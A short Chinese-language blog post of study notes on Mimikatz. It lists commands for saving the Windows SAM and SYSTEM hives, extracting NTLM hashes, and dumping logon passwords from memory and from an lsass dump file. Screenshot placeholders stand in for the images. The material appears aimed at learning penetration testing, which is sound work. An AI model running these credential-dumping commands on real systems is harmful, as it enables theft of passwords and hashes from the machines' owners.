Mimikatz學習筆記

使用SAM和System文件抓取密碼

導出sam和system文件抓取密碼

reg save hklm\sam sam.hive
reg save hklm\system system.hive
在這裏插入圖片描述

使用mimikatz讀取sam和system文件來獲得NTLM Hash

lsadump::sam /sam:sam.hive /system:system.hive
在這裏插入圖片描述

使用mimikatz直接讀取本地sam文件。

調成debug模式:privilege::debug
將權限提升至system:token::elevate
直接讀取SAM文件:lsadump::sam
在這裏插入圖片描述

使用mimikatz在線讀取SAM文件

不需要先運行mimikatz:
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords
在這裏插入圖片描述

mimikatz離線讀取lsass.dump

需要先獲得lsass的轉儲文件

使用mimikatz導出lsass.dump文件中的密碼散列值

載入dump文件: sekurlsa::minidump lsass.DMP
導出密碼: sekurlsa::logonPasswords full
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章